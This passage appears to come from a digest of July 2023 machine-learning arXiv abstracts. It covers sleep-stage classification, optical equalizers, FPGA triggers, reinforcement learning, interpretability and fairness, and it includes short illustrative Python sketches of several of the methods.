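node_feats = np.random.default_rng(0).normal(size=(4, 8))
node_feats_with_time = np.hstack([node_feats, temporal_encoding(ts, 16)])
```

    The augmented node features could then be fed to any GNN or transformer layer, letting attention distinguish transactions that are close or far apart in time.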
    Classification of sleep stages from EEG, EOG and EMG signals by SSNet. (arXiv:2307.05373v1 [eess.SP])
    Classification of sleep stages plays an essential role in diagnosing sleep-related diseases, including Sleep Disorder Breathing (SDB). In this study, we propose an end-to-end deep learning architecture, named SSNet, which comprises two deep learning networks based on Convolutional Neural Networks (CNN) and Long Short-Term Memory (LSTM). Both deep learning networks extract features from the combination of Electrooculogram (EOG), Electroencephalogram (EEG), and Electromyogram (EMG) signals, as each signal has distinct features that help in the classification of sleep stages. The features produced by the two deep learning networks are concatenated and passed to the fully connected layer for classification. The performance of our proposed model is evaluated using two public datasets, the Sleep-EDF Expanded dataset and the ISRUC-Sleep dataset. The accuracy and Kappa coefficient are 96.36% and 93.40%, respectively, for classifying three classes of sleep stages using the Sleep-EDF Expanded dataset, whereas the accuracy and Kappa coefficient are 96.57% and 83.05%, respectively, for five classes of sleep stages using the ISRUC-Sleep dataset. Our model achieves the best performance in classifying sleep stages when compared with the state-of-the-art techniques.
    Multi-Task Learning to Enhance Generalizability of Neural Network Equalizers in Coherent Optical Systems. (arXiv:2307.05374v1 [eess.SP])
    For the first time, multi-task learning is proposed to improve the flexibility of NN-based equalizers in coherent systems. A "single" NN-based equalizer improves Q-factor by up to 4 dB compared to CDC, without re-training, even with variations in launch power, symbol rate, or transmission distance.
    Fast Neural Network Inference on FPGAs for Triggering on Long-Lived Particles at Colliders. (arXiv:2307.05152v1 [hep-ex])
    Experimental particle physics demands a sophisticated trigger and acquisition system capable of efficiently retaining the collisions of interest for further investigation. Heterogeneous computing with the employment of FPGA cards may emerge as a trending technology for the triggering strategy of the upcoming high-luminosity program of the Large Hadron Collider at CERN. In this context, we present two machine-learning algorithms for selecting events where neutral long-lived particles decay within the detector volume, studying their accuracy and inference time when accelerated on commercially available Xilinx FPGA accelerator cards. The inference time is also compared with that of CPU- and GPU-based hardware setups. The proposed new algorithms are proven efficient for the considered benchmark physics scenario and their accuracy is found to not degrade when accelerated on the FPGA cards. The results indicate that all tested architectures fit within the latency requirements of a second-level trigger farm and that exploiting accelerator technologies for real-time processing of particle-physics collisions is a promising research field that deserves additional investigations, in particular with machine-learning models with a large number of trainable parameters.
    Decorrelation using Optimal Transport. (arXiv:2307.05187v1 [hep-ph])
    Being able to decorrelate a feature space from protected attributes is an area of active research in ethics, fairness, and the natural sciences. We introduce a novel decorrelation method using Convex Neural Optimal Transport Solvers (Cnots) that is able to decorrelate a continuous feature space against protected attributes with optimal transport. We demonstrate how well it performs in the context of jet classification in high energy physics, where classifier scores are desired to be decorrelated from the mass of a jet. The decorrelation achieved in binary classification approaches the levels achieved by the state-of-the-art using conditional normalising flows. When moving to multiclass outputs, the optimal transport approach performs significantly better than the state-of-the-art, suggesting substantial gains at decorrelating multidimensional feature spaces.
    $\ell_p$-Regression in the Arbitrary Partition Model of Communication. (arXiv:2307.05117v1 [cs.DS])
    We consider the randomized communication complexity of the distributed $\ell_p$-regression problem in the coordinator model, for $p\in (0,2]$. In this problem, there is a coordinator and $s$ servers. The $i$-th server receives $A^i\in\{-M, -M+1, \ldots, M\}^{n\times d}$ and $b^i\in\{-M, -M+1, \ldots, M\}^n$ and the coordinator would like to find a $(1+\epsilon)$-approximate solution to $\min_{x\in\mathbb{R}^d} \|(\sum_i A^i)x - (\sum_i b^i)\|_p$. Here $M \leq \mathrm{poly}(nd)$ for convenience. This model, where the data is additively shared across servers, is commonly referred to as the arbitrary partition model. We obtain significantly improved bounds for this problem. For $p = 2$, i.e., least squares regression, we give the first optimal bound of $\tilde{\Theta}(sd^2 + sd/\epsilon)$ bits. For $p \in (1,2)$, we obtain an $\tilde{O}(sd^2/\epsilon + sd/\mathrm{poly}(\epsilon))$ upper bound. Notably, for $d$ sufficiently large, our leading order term only depends linearly on $1/\epsilon$ rather than quadratically. We also show communication lower bounds of $\Omega(sd^2 + sd/\epsilon^2)$ for $p\in (0,1]$ and $\Omega(sd^2 + sd/\epsilon)$ for $p\in (1,2]$. Our bounds considerably improve previous bounds due to (Woodruff et al. COLT, 2013) and (Vempala et al., SODA, 2020).
    Contextual Pre-Planning on Reward Machine Abstractions for Enhanced Transfer in Deep Reinforcement Learning. (arXiv:2307.05209v1 [cs.AI])
    Recent studies show that deep reinforcement learning (DRL) agents tend to overfit to the task on which they were trained and fail to adapt to minor environment changes. To expedite learning when transferring to unseen tasks, we propose a novel approach to representing the current task using reward machines (RM), state machine abstractions that induce subtasks based on the current task's rewards and dynamics. Our method provides agents with symbolic representations of optimal transitions from their current abstract state and rewards them for achieving these transitions. These representations are shared across tasks, allowing agents to exploit knowledge of previously encountered symbols and transitions, thus enhancing transfer. Our empirical evaluation shows that our representations improve sample efficiency and few-shot transfer in a variety of domains.
    SimpleMTOD: A Simple Language Model for Multimodal Task-Oriented Dialogue with Symbolic Scene Representation. (arXiv:2307.04907v1 [cs.CL])
    SimpleMTOD is a simple language model which recasts several sub-tasks in multimodal task-oriented dialogues as sequence prediction tasks. SimpleMTOD is built on a large-scale transformer-based auto-regressive architecture, which has already proven to be successful in uni-modal task-oriented dialogues, and effectively leverages transfer learning from pre-trained GPT-2. In order to capture the semantics of visual scenes, we introduce both local and de-localized tokens for objects within a scene. De-localized tokens represent the type of an object rather than the specific object itself and so possess a consistent meaning across the dataset. SimpleMTOD achieves a state-of-the-art BLEU score (0.327) in the Response Generation sub-task of the SIMMC 2.0 test-std dataset while performing on par in other multimodal sub-tasks: Disambiguation, Coreference Resolution, and Dialog State Tracking. This is despite taking a minimalist approach for extracting visual (and non-visual) information. In addition, the model does not rely on task-specific architectural changes such as classification heads.
    Control as Probabilistic Inference as an Emergent Communication Mechanism in Multi-Agent Reinforcement Learning. (arXiv:2307.05004v1 [cs.AI])
    This paper proposes a generative probabilistic model integrating emergent communication and multi-agent reinforcement learning. The agents plan their actions by probabilistic inference, called control as inference, and communicate using messages that are latent variables and estimated based on the planned actions. Through these messages, each agent can send information about its actions and know information about the actions of another agent. Therefore, the agents change their actions according to the estimated messages to achieve cooperative tasks. This inference of messages can be considered as communication, and this procedure can be formulated by the Metropolis-Hastings naming game. Through experiments in the grid world environment, we show that the proposed probabilistic generative model (PGM) can infer meaningful messages to achieve the cooperative task.
    On the Use of Self-Supervised Speech Representations in Spontaneous Speech Synthesis. (arXiv:2307.05132v1 [eess.AS])
    Self-supervised learning (SSL) speech representations learned from large amounts of diverse, mixed-quality speech data without transcriptions are gaining ground in many speech technology applications. Prior work has shown that SSL is an effective intermediate representation in two-stage text-to-speech (TTS) for both read and spontaneous speech. However, it is still not clear which SSL model and which layer of each model are most suited for spontaneous TTS. We address this shortcoming by extending the scope of comparison for SSL in spontaneous TTS to 6 different SSLs and 3 layers within each SSL. Furthermore, SSL has also shown potential in predicting the mean opinion scores (MOS) of synthesized speech, but this has only been done in read-speech MOS prediction. We extend an SSL-based MOS prediction framework previously developed for scoring read speech synthesis and evaluate its performance on synthesized spontaneous speech. All experiments are conducted twice on two different spontaneous corpora in order to find generalizable trends. Overall, we present comprehensive experimental results on the use of SSL in spontaneous TTS and MOS prediction to further quantify and understand how SSL can be used in spontaneous TTS. Audio samples: https://www.speech.kth.se/tts-demos/sp_ssl_tts
    Using Linear Regression for Iteratively Training Neural Networks. (arXiv:2307.05189v1 [cs.LG])
    We present a simple linear regression based approach for learning the weights and biases of a neural network, as an alternative to standard gradient based backpropagation. The present work is exploratory in nature, and we restrict the description and experiments to (i) simple feedforward neural networks, (ii) scalar (single output) regression problems, and (iii) invertible activation functions. However, the approach is intended to be extensible to larger, more complex architectures. The key idea is the observation that the input to every neuron in a neural network is a linear combination of the activations of neurons in the previous layer, as well as the parameters (weights and biases) of the layer. If we are able to compute the ideal total input values to every neuron by working backwards from the output, we can formulate the learning problem as a linear least squares problem which iterates between updating the parameters and the activation values. We present an explicit algorithm that implements this idea, and we show that (at least for simple problems) the approach is more stable and faster than gradient-based backpropagation.
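    The alternating least-squares idea described above can be sketched on a toy scalar-regression problem. The update rule for the "ideal" hidden activations below (a small nudge along the residual direction, clipped into tanh's range) is an illustrative assumption, not the paper's explicit algorithm; only the overall structure, alternating least-squares fits of each layer in place of gradient descent, is taken from the abstract.

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy scalar-regression task
X = rng.normal(size=(200, 3))
y = np.sin(X @ np.array([1.0, -2.0, 0.5]))

# One hidden layer with tanh (invertible on (-1, 1)), scalar linear output
H = 16
W1 = rng.normal(scale=0.5, size=(3, H)); b1 = np.zeros(H)
W2 = rng.normal(scale=0.5, size=(H, 1)); b2 = np.zeros(1)

def forward(X):
    A = np.tanh(X @ W1 + b1)          # hidden activations
    return A, (A @ W2 + b2).ravel()   # network output

def mse():
    return float(np.mean((forward(X)[1] - y) ** 2))

def fit_readout():
    """Least-squares fit of the output layer given hidden activations."""
    global W2, b2
    A = forward(X)[0]
    Ab = np.hstack([A, np.ones((len(A), 1))])
    w, *_ = np.linalg.lstsq(Ab, y[:, None], rcond=None)
    W2, b2 = w[:-1], w[-1]

loss_before = mse()
for _ in range(5):
    fit_readout()
    # "Ideal" hidden activations: nudge A toward reducing the output
    # residual, then keep the targets inside tanh's range
    A = forward(X)[0]
    resid = y[:, None] - (A @ W2 + b2)
    A_target = np.clip(A + 0.1 * resid @ W2.T, -0.999, 0.999)
    # Invert the activation and fit the first layer by least squares
    Z_target = np.arctanh(A_target)
    Xb = np.hstack([X, np.ones((len(X), 1))])
    w, *_ = np.linalg.lstsq(Xb, Z_target, rcond=None)
    W1, b1 = w[:-1], w[-1]
fit_readout()                          # final least-squares readout
loss_after = mse()
```

    Each step solves a plain linear least-squares problem, so no gradients or learning-rate schedules are involved, which is what the paper argues makes the approach stable.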
    Feature Activation Map: Visual Explanation of Deep Learning Models for Image Classification. (arXiv:2307.05017v1 [cs.CV])
    Decisions made by convolutional neural networks (CNN) can be understood and explained by visualizing discriminative regions on images. To this end, Class Activation Map (CAM) based methods were proposed as powerful interpretation tools, making the prediction of deep learning models more explainable, transparent, and trustworthy. However, all the CAM-based methods (e.g., CAM, Grad-CAM, and Relevance-CAM) can only be used for interpreting CNN models with fully-connected (FC) layers as a classifier. It is worth noting that many deep learning models classify images without FC layers, e.g., few-shot learning image classification, contrastive learning image classification, and image retrieval tasks. In this work, a post-hoc interpretation tool named feature activation map (FAM) is proposed, which can interpret deep learning models without FC layers as a classifier. In the proposed FAM algorithm, the channel-wise contribution weights are derived from the similarity scores between two image embeddings. The activation maps are linearly combined with the corresponding normalized contribution weights, forming the explanation map for visualization. The quantitative and qualitative experiments conducted on ten deep learning models for few-shot image classification, contrastive learning image classification, and image retrieval tasks demonstrate the effectiveness of the proposed FAM algorithm.
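    A hedged reading of the FAM construction: since the dot-product similarity of two embeddings decomposes into per-channel products, those products can serve as channel-wise contribution weights for combining the query's activation maps. The sketch below assumes global-average-pooled feature maps as the embeddings and made-up tensor sizes; the paper's actual weight derivation and normalization may differ.

```python
import numpy as np

rng = np.random.default_rng(0)

def feature_activation_map(feats_query, feats_support):
    """FAM-style explanation sketch: derive channel weights from the
    similarity of two image embeddings (here, global-average-pooled
    feature maps) and linearly combine the query's activation maps."""
    C, H, W = feats_query.shape
    e_q = feats_query.reshape(C, -1).mean(axis=1)    # query embedding
    e_s = feats_support.reshape(C, -1).mean(axis=1)  # support embedding
    w = e_q * e_s                  # per-channel similarity contributions
    w = w / (np.abs(w).sum() + 1e-12)   # normalized contribution weights
    fam = np.tensordot(w, feats_query, axes=1)       # (H, W) explanation
    return fam

# Toy CNN feature maps: 8 channels of 7x7 activations for two images
fam = feature_activation_map(rng.random((8, 7, 7)), rng.random((8, 7, 7)))
```

    The resulting map can be upsampled and overlaid on the query image, exactly as CAM-style heatmaps are, but without requiring an FC classifier head.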
    On the Effectiveness of Speech Self-supervised Learning for Music. (arXiv:2307.05161v1 [cs.SD])
    Self-supervised learning (SSL) has shown promising results in various speech and natural language processing applications. However, its efficacy in music information retrieval (MIR) still remains largely unexplored. While previous SSL models pre-trained on music recordings may have been mostly closed-sourced, recent speech models such as wav2vec2.0 have shown promise in music modelling. Nevertheless, research exploring the effectiveness of applying speech SSL models to music recordings has been limited. We explore the music adaptation of SSL with two distinctive speech-related models, data2vec1.0 and HuBERT, and refer to them as music2vec and musicHuBERT, respectively. We train $12$ SSL models with 95M parameters under various pre-training configurations and systematically evaluate the MIR task performances with 13 different MIR tasks. Our findings suggest that training with music data can generally improve performance on MIR tasks, even when models are trained using paradigms designed for speech. However, we identify the limitations of such existing speech-oriented designs, especially in modelling polyphonic information. Based on the experimental results, empirical suggestions are also given for designing future musical SSL strategies and paradigms.
    CREPE: Learnable Prompting With CLIP Improves Visual Relationship Prediction. (arXiv:2307.04838v1 [cs.CV])
    In this paper, we explore the potential of Vision-Language Models (VLMs), specifically CLIP, in predicting visual object relationships, which involves interpreting visual features from images into language-based relations. Current state-of-the-art methods use complex graphical models that utilize language cues and visual features to address this challenge. We hypothesize that the strong language priors in CLIP embeddings can simplify these graphical models, paving the way for a simpler approach. We adopt the UVTransE relation prediction framework, which learns the relation as a translational embedding with subject, object, and union box embeddings from a scene. We systematically explore the design of CLIP-based subject, object, and union-box representations within the UVTransE framework and propose CREPE (CLIP Representation Enhanced Predicate Estimation). CREPE utilizes text-based representations for all three bounding boxes and introduces a novel contrastive training strategy to automatically infer the text prompt for the union-box. Our approach achieves state-of-the-art performance in predicate estimation, mR@5 27.79 and mR@20 31.95 on the Visual Genome benchmark, achieving a 15.3\% gain in performance over the recent state-of-the-art at mR@20. This work demonstrates CLIP's effectiveness in object relation prediction and encourages further research on VLMs in this challenging domain.
    A Theory of Bounded Inductive Rationality. (arXiv:2307.05068v1 [cs.AI])
    The dominant theories of rational choice assume logical omniscience. That is, they assume that when facing a decision problem, an agent can perform all relevant computations and determine the truth value of all relevant logical/mathematical claims. This assumption is unrealistic when, for example, we offer bets on remote digits of pi or when an agent faces a computationally intractable planning problem. Furthermore, the assumption of logical omniscience creates contradictions in cases where the environment can contain descriptions of the agent itself. Importantly, strategic interactions as studied in game theory are decision problems in which a rational agent is predicted by its environment (the other players). In this paper, we develop a theory of rational decision making that does not assume logical omniscience. We consider agents who repeatedly face decision problems (including ones like betting on digits of pi or games against other agents). The main contribution of this paper is to provide a sensible theory of rationality for such agents. Roughly, we require that a boundedly rational inductive agent tests each efficiently computable hypothesis infinitely often and follows those hypotheses that keep their promises of high rewards. We then prove that agents that are rational in this sense have other desirable properties. For example, they learn to value random and pseudo-random lotteries at their expected reward. Finally, we consider strategic interactions between different agents and prove a folk theorem for what strategies boundedly rational inductive agents can converge to.
    Enhancing Continuous Time Series Modelling with a Latent ODE-LSTM Approach. (arXiv:2307.05126v1 [cs.LG])
    Due to their dynamic properties such as irregular sampling rate and high-frequency sampling, Continuous Time Series (CTS) are found in many applications. Since CTS with irregular sampling rate are difficult to model with standard Recurrent Neural Networks (RNNs), RNNs have been generalised to have continuous-time hidden dynamics defined by a Neural Ordinary Differential Equation (Neural ODE), leading to the ODE-RNN model. Another approach that provides better modelling is the Latent ODE model, which constructs a continuous-time model where a latent state is defined at all times. The Latent ODE model uses a standard RNN as the encoder and a Neural ODE as the decoder. However, since the RNN encoder leads to difficulties with missing data and ill-defined latent variables, a Latent ODE-RNN model has recently been proposed that uses an ODE-RNN model as the encoder instead. Both the Latent ODE and Latent ODE-RNN models are difficult to train due to the vanishing and exploding gradients problem. To overcome this problem, the main contribution of this paper is to propose and illustrate a new model based on a new Latent ODE using an ODE-LSTM (Long Short-Term Memory) network as an encoder -- the Latent ODE-LSTM model. To limit the growth of the gradients, the Norm Gradient Clipping strategy was embedded in the Latent ODE-LSTM model. The performance evaluation of the new Latent ODE-LSTM (with and without Norm Gradient Clipping) for modelling CTS with regular and irregular sampling rates is then demonstrated. Numerical experiments show that the new Latent ODE-LSTM performs better than Latent ODE-RNNs and can avoid the vanishing and exploding gradients during training.
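    Norm gradient clipping itself is simple to state: rescale all gradients jointly whenever their global L2 norm exceeds a threshold. A minimal numpy sketch, independent of any particular model:

```python
import numpy as np

def clip_grad_norm(grads, max_norm):
    """Rescale a list of gradient arrays so their global L2 norm does
    not exceed max_norm; leave them untouched when already smaller."""
    total = np.sqrt(sum(float(np.sum(g ** 2)) for g in grads))
    scale = max_norm / (total + 1e-12)
    if scale < 1.0:
        grads = [g * scale for g in grads]
    return grads, total

# An "exploding" gradient step gets rescaled down to the threshold
grads = [np.full((3, 3), 10.0), np.full(3, -10.0)]
clipped, before = clip_grad_norm(grads, max_norm=1.0)
after = np.sqrt(sum(np.sum(g ** 2) for g in clipped))
```

    Applied at every optimizer step, this bounds the size of parameter updates without changing the gradient direction, which is why it helps against exploding gradients in recurrent models such as the ODE-LSTM encoder.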
    TIAM -- A Metric for Evaluating Alignment in Text-to-Image Generation. (arXiv:2307.05134v1 [cs.CV])
    The progress in the generation of synthetic images has made it crucial to assess their quality. While several metrics have been proposed to assess the rendering of images, it is crucial for Text-to-Image (T2I) models, which generate images based on a prompt, to consider additional aspects such as the extent to which the generated image matches the important content of the prompt. Moreover, although the generated images usually result from a random starting point, the influence of this starting point is generally not considered. In this article, we propose a new metric based on prompt templates to study the alignment between the content specified in the prompt and the corresponding generated images. It allows us to better characterize the alignment in terms of the type of the specified objects, their number, and their color. We conducted a study of several recent T2I models covering various aspects. An additional interesting result we obtained with our approach is that image quality can vary drastically depending on the latent noise used as a seed for the images. We also quantify the influence of the number of concepts in the prompt, their order, as well as their (color) attributes. Finally, our method allows us to identify some latent seeds that produce better images than others, opening novel directions of research on this understudied topic.
    Diagnosing Model Performance Under Distribution Shift. (arXiv:2303.02011v4 [stat.ML] UPDATED)
    Prediction models can perform poorly when deployed to target distributions different from the training distribution. To understand these operational failure modes, we develop a method, called DIstribution Shift DEcomposition (DISDE), to attribute a drop in performance to different types of distribution shifts. Our approach decomposes the performance drop into terms for 1) an increase in harder but frequently seen examples from training, 2) changes in the relationship between features and outcomes, and 3) poor performance on examples infrequent or unseen during training. These terms are defined by fixing a distribution on $X$ while varying the conditional distribution of $Y \mid X$ between training and target, or by fixing the conditional distribution of $Y \mid X$ while varying the distribution on $X$. In order to do this, we define a hypothetical distribution on $X$ consisting of values common in both training and target, over which it is easy to compare $Y \mid X$ and thus predictive performance. We estimate performance on this hypothetical distribution via reweighting methods. Empirically, we show how our method can 1) inform potential modeling improvements across distribution shifts for employment prediction on tabular census data, and 2) help to explain why certain domain adaptation methods fail to improve model performance for satellite image classification.
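    The reweighting idea at the heart of such a decomposition can be illustrated on a one-dimensional toy problem where the density ratio between source and target covariates is known in closed form. The Gaussians and the quadratic "loss" below are illustrative assumptions, not DISDE itself; the point is only that reweighting source samples by $p_t(x)/p_s(x)$ recovers target-distribution performance for a fixed $Y \mid X$ relationship.

```python
import numpy as np

rng = np.random.default_rng(0)

# Source (training) and target covariate distributions: N(0,1) vs N(1,1)
mu_s, mu_t = 0.0, 1.0
x_s = rng.normal(mu_s, 1.0, 20000)
x_t = rng.normal(mu_t, 1.0, 20000)

def loss(x):
    """Per-example loss of some fixed model; harder for larger |x|."""
    return x ** 2

# Exact density ratio p_t(x)/p_s(x) for the two known unit-variance Gaussians
w = np.exp(-0.5 * ((x_s - mu_t) ** 2 - (x_s - mu_s) ** 2))

perf_source = loss(x_s).mean()              # ~ E[x^2] under N(0,1) = 1
perf_target_direct = loss(x_t).mean()       # ~ E[x^2] under N(1,1) = 2
perf_target_reweighted = np.average(loss(x_s), weights=w)
```

    In practice the density ratio is unknown and must be estimated, e.g. with a probabilistic classifier distinguishing source from target samples; DISDE builds its decomposition terms on top of such reweighted performance estimates.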
    Benchmarking Algorithms for Federated Domain Generalization. (arXiv:2307.04942v1 [cs.LG])
    While prior domain generalization (DG) benchmarks consider train-test dataset heterogeneity, we evaluate Federated DG which introduces federated learning (FL) specific challenges. Additionally, we explore domain-based heterogeneity in clients' local datasets - a realistic Federated DG scenario. Prior Federated DG evaluations are limited in terms of the number or heterogeneity of clients and dataset diversity. To address this gap, we propose a Federated DG benchmark methodology that enables control of the number and heterogeneity of clients and provides metrics for dataset difficulty. We then apply our methodology to evaluate 13 Federated DG methods, which include centralized DG methods adapted to the FL context, FL methods that handle client heterogeneity, and methods designed specifically for Federated DG. Our results suggest that despite some progress, there remain significant performance gaps in Federated DG, particularly when evaluating with a large number of clients, high client heterogeneity, or more realistic datasets. Please check our extendable benchmark code here: https://github.com/inouye-lab/FedDG_Benchmark.
    Benchmarking Bayesian Causal Discovery Methods for Downstream Treatment Effect Estimation. (arXiv:2307.04988v1 [cs.LG])
    The practical utility of causality in decision-making is widely recognized, with causal discovery and inference being inherently intertwined. Nevertheless, a notable gap exists in the evaluation of causal discovery methods, where insufficient emphasis is placed on downstream inference. To address this gap, we evaluate six established baseline causal discovery methods and a newly proposed method based on GFlowNets, on the downstream task of treatment effect estimation. Through the implementation of a robust evaluation procedure, we offer valuable insights into the efficacy of these causal discovery methods for treatment effect estimation, considering both synthetic and real-world scenarios, as well as low-data scenarios. Furthermore, the results of our study demonstrate that GFlowNets possess the capability to effectively capture a wide range of useful and diverse average treatment effect (ATE) modes.
    Onion Universe Algorithm: Applications in Weakly Supervised Learning. (arXiv:2307.04870v1 [cs.LG])
    We introduce Onion Universe Algorithm (OUA), a novel classification method in ensemble learning. In particular, we show its applicability as a label model for weakly supervised learning. OUA offers simplicity in implementation, computational efficiency, and does not rely on any assumptions regarding the data or weak signals. The model is well suited for scenarios where fully labeled data is not available. Our method is built upon a geometrical interpretation of the space spanned by weak signals. Empirical results support our analysis of the hidden geometric structure underlying a general set of weak signals and also illustrate that OUA works well in practice. We show empirical evidence that OUA performs favorably on common benchmark datasets compared to existing label models for weakly supervised learning.
    Reinforcement Learning with Non-Cumulative Objective. (arXiv:2307.04957v1 [cs.LG])
    In reinforcement learning, the objective is almost always defined as a \emph{cumulative} function over the rewards along the process. However, there are many optimal control and reinforcement learning problems in various application fields, especially in communications and networking, where the objectives are not naturally expressed as summations of the rewards. In this paper, we recognize the prevalence of non-cumulative objectives in various problems, and propose a modification to existing algorithms for optimizing such objectives. Specifically, we dive into the fundamental building block for many optimal control and reinforcement learning algorithms: the Bellman optimality equation. To optimize a non-cumulative objective, we replace the original summation operation in the Bellman update rule with a generalized operation corresponding to the objective. Furthermore, we provide sufficient conditions on the form of the generalized operation as well as assumptions on the Markov decision process under which the globally optimal convergence of the generalized Bellman updates can be guaranteed. We demonstrate the idea experimentally with the bottleneck objective, i.e., the objectives determined by the minimum reward along the process, on classical optimal control and reinforcement learning tasks, as well as on two network routing problems on maximizing the flow rates.
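    The proposed modification, replacing the summation in the Bellman update with an operation matched to the objective, can be shown on a tiny deterministic MDP where the bottleneck (minimum-reward) objective prefers a different path than the cumulative one. The MDP below is made up for illustration:

```python
import numpy as np

# Deterministic toy MDP: (state, action) -> (reward, next state); state 3 is terminal.
# Action 0 from state 0 has a high first reward but a poor link later;
# action 1 has modest rewards all along the path.
T = {
    (0, 0): (10.0, 1),
    (0, 1): (3.0, 2),
    (1, 0): (1.0, 3),
    (2, 0): (4.0, 3),
}

def value_iteration(op, terminal_value, iters=50):
    """Generalized Bellman updates: V(s) = max_a op(r, V(s')), where op is
    addition for the usual cumulative return and min for the bottleneck
    (minimum-reward-along-the-path) objective."""
    V = {s: terminal_value for s in (0, 1, 2, 3)}
    for _ in range(iters):
        for s in (0, 1, 2):
            V[s] = max(op(r, V[s2]) for (s0, a), (r, s2) in T.items() if s0 == s)
    return V

V_sum = value_iteration(lambda r, v: r + v, terminal_value=0.0)
V_min = value_iteration(min, terminal_value=float("inf"))
```

    Note the terminal value is the identity element of the chosen operation (0 for addition, $+\infty$ for min). Under the cumulative objective the path through state 1 is best ($10 + 1 = 11$ vs $3 + 4 = 7$), while under the bottleneck objective the other path wins ($\min(10, 1) = 1$ vs $\min(3, 4) = 3$).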
    Improving Fairness of Graph Neural Networks: A Graph Counterfactual Perspective. (arXiv:2307.04937v1 [cs.LG])
    Graph neural networks (GNNs) have shown great ability in representation learning on graphs, facilitating various tasks. Despite their great performance in modeling graphs, recent works show that GNNs tend to inherit and amplify the bias from training data, raising concerns about the adoption of GNNs in high-stake scenarios. Hence, many efforts have been made toward fairness-aware GNNs. However, most existing fair GNNs learn fair node representations by adopting statistical fairness notions, which may fail to alleviate bias in the presence of statistical anomalies. Motivated by causal theory, there are several attempts utilizing graph counterfactual fairness to mitigate root causes of unfairness. However, these methods suffer from non-realistic counterfactuals obtained by perturbation or generation. In this paper, we take a causal view on the fair graph learning problem. Guided by the causal analysis, we propose a novel framework, CAF, which can select counterfactuals from training data to avoid non-realistic counterfactuals and adopt the selected counterfactuals to learn fair node representations for the node classification task. Extensive experiments on synthetic and real-world datasets show the effectiveness of CAF.
    DDGM: Solving inverse problems by Diffusive Denoising of Gradient-based Minimization. (arXiv:2307.04946v1 [cs.CV])
    Inverse problems generally require a regularizer or prior for a good solution. A recent trend is to train a convolutional net to denoise images, and use this net as a prior when solving the inverse problem. Several proposals depend on a singular value decomposition of the forward operator, and several others backpropagate through the denoising net at runtime. Here we propose a simpler approach that combines the traditional gradient-based minimization of reconstruction error with denoising. Noise is also added at each step, so the iterative dynamics resembles a Langevin or diffusion process. Both the level of added noise and the size of the denoising step decay exponentially with time. We apply our method to the problem of tomographic reconstruction from electron micrographs acquired at multiple tilt angles. With empirical studies using simulated tilt views, we find parameter settings for our method that produce good results. We show that high accuracy can be achieved with as few as 50 denoising steps. We also compare with DDRM and DPS, more complex diffusion methods of the kinds mentioned above. These methods are less accurate (as measured by MSE and SSIM) for our tomography problem, even after the generation hyperparameters are optimized. Finally, we extend our method to reconstruction of arbitrary-sized images and show results on 128 $\times$ 1568 pixel images.
    SigOpt Mulch: An Intelligent System for AutoML of Gradient Boosted Trees. (arXiv:2307.04849v1 [cs.LG])
    Gradient boosted trees (GBTs) are ubiquitous models used by researchers, machine learning (ML) practitioners, and data scientists because of their robust performance, interpretable behavior, and ease-of-use. One critical challenge in training GBTs is the tuning of their hyperparameters. In practice, selecting these hyperparameters is often done manually. Recently, the ML community has advocated for tuning hyperparameters through black-box optimization and developed state-of-the-art systems to do so. However, applying such systems to tune GBTs suffers from two drawbacks. First, these systems are not \textit{model-aware}, rather they are designed to apply to a \textit{generic} model; this leaves significant optimization performance on the table. Second, using these systems requires \textit{domain knowledge} such as the choice of hyperparameter search space, which is an antithesis to the automatic experimentation that black-box optimization aims to provide. In this paper, we present SigOpt Mulch, a model-aware hyperparameter tuning system specifically designed for automated tuning of GBTs that provides two improvements over existing systems. First, Mulch leverages powerful techniques in metalearning and multifidelity optimization to perform model-aware hyperparameter optimization. Second, it automates the process of learning performant hyperparameters by making intelligent decisions about the optimization search space, thus reducing the need for user domain knowledge. These innovations allow Mulch to identify good GBT hyperparameters far more efficiently -- and in a more seamless and user-friendly way -- than existing black-box hyperparameter tuning systems.
    Dynamics of Temporal Difference Reinforcement Learning. (arXiv:2307.04841v1 [stat.ML])
    Reinforcement learning has been successful across several applications in which agents have to learn to act in environments with sparse feedback. However, despite this empirical success, there is still a lack of theoretical understanding of how the parameters of reinforcement learning models and the features used to represent states interact to control the dynamics of learning. In this work, we use concepts from statistical physics to study the typical-case learning curves for temporal difference learning of a value function with linear function approximators. Our theory is derived under a Gaussian equivalence hypothesis, where averages over the random trajectories are replaced with temporally correlated Gaussian feature averages, and we validate our assumptions on small-scale Markov Decision Processes. We find that the stochastic semi-gradient noise due to subsampling the space of possible episodes leads to significant plateaus in the value error, unlike in traditional gradient descent dynamics. We study how learning dynamics and plateaus depend on feature structure, learning rate, discount factor, and reward function. We then analyze how strategies like learning rate annealing and reward shaping can favorably alter learning dynamics and plateaus. To conclude, our work introduces new tools that open a direction towards developing a theory of learning dynamics in reinforcement learning.
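For concreteness, semi-gradient TD(0) with a linear value approximator $V(s) = \phi(s)^\top w$, the setting the theory analyzes, looks like this minimal sketch on a toy deterministic cyclic-chain MDP. The chain, sweep schedule, and hyperparameters are illustrative stand-ins, not the paper's experimental setup:

```python
import numpy as np

def td0_linear(features, rewards, alpha=0.05, gamma=0.9, n_sweeps=200):
    """Semi-gradient TD(0) with a linear value approximator.

    features: (n_states, d) feature matrix phi, rewards: (n_states,)
    reward received on leaving each state of a deterministic cyclic
    chain. Returns the learned weight vector w.
    """
    n, d = features.shape
    w = np.zeros(d)
    for _ in range(n_sweeps):
        for s in range(n):
            s_next = (s + 1) % n                       # deterministic chain
            td_error = (rewards[s]
                        + gamma * features[s_next] @ w
                        - features[s] @ w)
            w += alpha * td_error * features[s]        # semi-gradient update
    return w
```

With one-hot (tabular) features this converges to the exact values solving $V(s) = r_s + \gamma V(s{+}1 \bmod n)$.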
    Learning to Solve Constraint Satisfaction Problems with Recurrent Transformer. (arXiv:2307.04895v1 [cs.AI])
    Constraint satisfaction problems (CSPs) are about finding values of variables that satisfy the given constraints. We show that Transformer extended with recurrence is a viable approach to learning to solve CSPs in an end-to-end manner, having clear advantages over state-of-the-art methods such as Graph Neural Networks, SATNet, and some neuro-symbolic models. With the ability of Transformer to handle visual input, the proposed Recurrent Transformer can straightforwardly be applied to visual constraint reasoning problems while successfully addressing the symbol grounding problem. We also show how to leverage deductive knowledge of discrete constraints in the Transformer's inductive learning to achieve sample-efficient learning and semi-supervised learning for CSPs.
    Route, Interpret, Repeat: Blurring the line between post hoc explainability and interpretable models. (arXiv:2307.05350v1 [cs.LG])
